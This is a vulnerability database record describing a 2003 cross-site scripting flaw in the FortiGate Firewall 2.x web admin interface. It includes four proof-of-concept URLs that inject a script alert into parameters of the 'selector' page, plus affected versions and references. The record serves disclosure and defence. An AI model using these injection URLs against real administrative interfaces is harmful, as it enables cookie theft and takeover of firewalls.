ID

VAR-E-200311-0029


EDB ID

23379


TITLE

Fortigate Firewall 2.x - selector Admin Interface Cross-Site Scripting - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 23379

DESCRIPTION

Fortigate Firewall 2.x - selector Admin Interface Cross-Site Scripting. CVE-3296. Remote exploit for Hardware platform.

Trust: 0.6

sources: EXPLOIT-DB: 23379

AFFECTED PRODUCTS

vendor: fortigate, model: firewall, scope: eq, version: 2.x

Trust: 1.0

vendor: fortinet, model: fortios, scope: eq, version: 2.50

Trust: 0.3

vendor: fortinet, model: fortios, scope: eq, version: 2.36

Trust: 0.3

vendor: fortinet, model: fortios 0mr4, scope: eq, version: 2.5

Trust: 0.3

vendor: fortinet, model: fortios mr5, scope: ne, version: 2.50

Trust: 0.3

sources: BID: 9033 // EXPLOIT-DB: 23379

EXPLOIT

source: https://www.securityfocus.com/bid/9033/info

Multiple cross-site scripting vulnerabilities have been reported in the FortiGate Firewall web administrative interface.

These issues could be exploited by enticing an administrative user to follow a malicious link that includes hostile HTML and script code as values for URI parameters. If such a link is followed, the hostile code may be rendered in the administrator's browser. This could lead to theft of cookie-based authentication credentials, which contain the username and MD5 hash of the password, allowing for full compromise of the firewall.

http://www.example.com/theme1/selector?button=status,monitor,session"><script>alert('oops')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session

http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status"><script>alert('oops')</script>,/system/status/moniter,/system/status/session

http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter"><script>alert('oops')</script>,/system/status/session

http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session"><script>alert('oops')</script>

Trust: 1.0

sources: EXPLOIT-DB: 23379

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 23379

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 23379

TYPE

selector Admin Interface Cross-Site Scripting

Trust: 1.0

sources: EXPLOIT-DB: 23379

CREDITS

Maarten Hartsuijker

Trust: 0.6

sources: EXPLOIT-DB: 23379

EXTERNAL IDS

db: BID, id: 9033

Trust: 1.9

db: EXPLOIT-DB, id: 23379

Trust: 1.6

db: EDBNET, id: 45524

Trust: 0.6

sources: BID: 9033 // EXPLOIT-DB: 23379 // EDBNET: 45524

REFERENCES

url: https://www.securityfocus.com/bid/9033/info

Trust: 1.0

url: https://www.exploit-db.com/exploits/23379/

Trust: 0.6

url: http://www.fortinet.com/

Trust: 0.3

sources: BID: 9033 // EXPLOIT-DB: 23379 // EDBNET: 45524

SOURCES

db: BID, id: 9033
db: EXPLOIT-DB, id: 23379
db: EDBNET, id: 45524

LAST UPDATE DATE

2022-07-27T09:17:49.742000+00:00


SOURCES UPDATE DATE

db: BID, id: 9033, date: 2003-11-12T00:00:00

SOURCES RELEASE DATE

db: BID, id: 9033, date: 2003-11-12T00:00:00
db: EXPLOIT-DB, id: 23379, date: 2003-11-12T00:00:00
db: EDBNET, id: 45524, date: 2003-11-12T00:00:00